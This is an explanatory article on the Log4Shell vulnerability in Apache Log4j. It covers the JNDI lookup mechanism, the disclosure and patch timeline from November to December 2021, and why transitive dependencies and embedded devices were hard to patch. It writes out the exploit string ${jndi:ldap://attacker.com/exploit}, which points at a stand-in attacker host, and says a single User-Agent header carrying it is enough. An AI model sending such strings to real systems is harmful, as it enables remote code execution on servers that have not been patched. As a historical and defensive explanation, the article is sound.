Log4Shell: A Feature Nobody Needed, a Vulnerability in a Billion Systems
Log4Shell: A Feature Nobody Needed, a Vulnerability in a Billion Systems, and the Supply Chain That Could Not Be Patched Fast Enough
The System as Its Engineers Understood It
Apache Log4j is a logging library for Java. It is one of the most widely used components in the Java ecosystem. Logging is infrastructure: nearly every Java application writes log messages, and Log4j is the most common way to do it. Estimates of Log4j’s deployment scope vary, but the library is present in hundreds of millions of Java applications and devices worldwide, from web servers to enterprise applications to embedded systems to Minecraft servers.
Log4j does more than write strings to files. It has a feature called message lookup substitution. When a log message contains a string of the form ${...}, Log4j interprets the content between the braces as a lookup expression and substitutes the result. For example, ${java:version} is replaced with the Java runtime version. ${env:USER} is replaced with the value of the USER environment variable. This is a convenience feature: developers can embed dynamic values in log messages without concatenation.
One of the available lookup types is JNDI (Java Naming and Directory Interface). JNDI is a Java API for accessing naming and directory services: LDAP directories, DNS, RMI registries. A JNDI lookup in a log message takes the form ${jndi:ldap://example.com/exploit}. When Log4j encounters this string in a log message, it:
- Parses the JNDI lookup expression
- Connects to the specified LDAP server (
example.com) - Retrieves the object at the specified path (
/exploit) - The LDAP response can include a reference to a Java class hosted on a remote server
- Java loads and instantiates that remote class
Step 5 means that an attacker who can control any part of a log message can execute arbitrary code on the server running Log4j.
The JNDI lookup feature was added to Log4j 2.0-beta9 in 2013. It was intended for use cases like logging configuration that varies by environment: looking up a configuration value from an LDAP directory or a DNS service. Whether anyone used it for this purpose at significant scale is unclear. What is clear is that the feature was available and enabled by default in every Log4j 2.x installation from 2013 onward.
The attack surface is enormous because log messages contain user-controlled data. Web servers log HTTP headers. User-Agent, Referer, X-Forwarded-For, any header can contain attacker-controlled strings. Application servers log user input for debugging. Authentication systems log usernames. Any point where user-supplied data is written to a log message through Log4j 2.x is a potential attack vector.
The Chain
November 24, 2021. Chen Zhaojun of Alibaba’s Cloud Security Team reports the vulnerability to the Apache Software Foundation. The vulnerability is assigned CVE-2021-44228 and a severity score of 10.0 out of 10.0 (the maximum).
December 1, 2021. A pull request is created in the Apache Log4j GitHub repository to address the vulnerability. The pull request is not immediately merged because the fix requires careful review to avoid breaking backwards compatibility.
December 9, 2021. The vulnerability is disclosed publicly before a patch is widely available. Proof-of-concept exploit code begins circulating. The vulnerability is trivially exploitable: an attacker sends a string containing ${jndi:ldap://attacker.com/exploit} in any field that will be logged. No authentication is required. No special conditions are needed. A single HTTP request with the exploit string in the User-Agent header is sufficient.
December 10, 2021. Apache releases Log4j 2.15.0, which disables JNDI lookups in log messages by default. Exploitation attempts surge. Security firms report scanning activity from IP addresses worldwide, probing every accessible service for Log4Shell vulnerability.
December 10-14, 2021. The initial patch (2.15.0) is found to be incomplete. Certain configurations remain vulnerable. Apache releases 2.16.0 on December 13, which disables message lookup substitution entirely by default. On December 17, a denial-of-service vulnerability in 2.16.0 is discovered, and Apache releases 2.17.0. On December 28, an additional remote code execution variant is found, and 2.17.1 is released.
Four patches in 18 days. Each patch addressing a variant or incompleteness in the previous patch.
December 2021 through 2022. The patching challenge becomes apparent. Identifying which systems contain Log4j is the first problem. Log4j is a transitive dependency: it is included in other libraries and frameworks, which are included in applications, which are deployed in containers, which run on servers. An organization may have hundreds of applications, and determining which ones contain Log4j 2.x requires scanning every application’s dependency tree, every container image, and every server.
The second problem is embedded systems. Log4j is present in network appliances, IoT devices, industrial controllers, and other systems that cannot be easily patched. These systems may run Java applications that include Log4j as a transitive dependency, and the device manufacturer may be slow to release a firmware update, or may no longer support the device.
The diagram shows the attack mechanism in five steps: attacker sends a crafted string, the string is passed to Log4j for logging, Log4j parses the JNDI lookup, Log4j connects to the attacker’s LDAP server, and the LDAP response directs the JVM to load and execute attacker-controlled code. The critical observation is that the attack crosses the boundary from “data being logged” to “code being executed” through a feature that was designed to work exactly this way.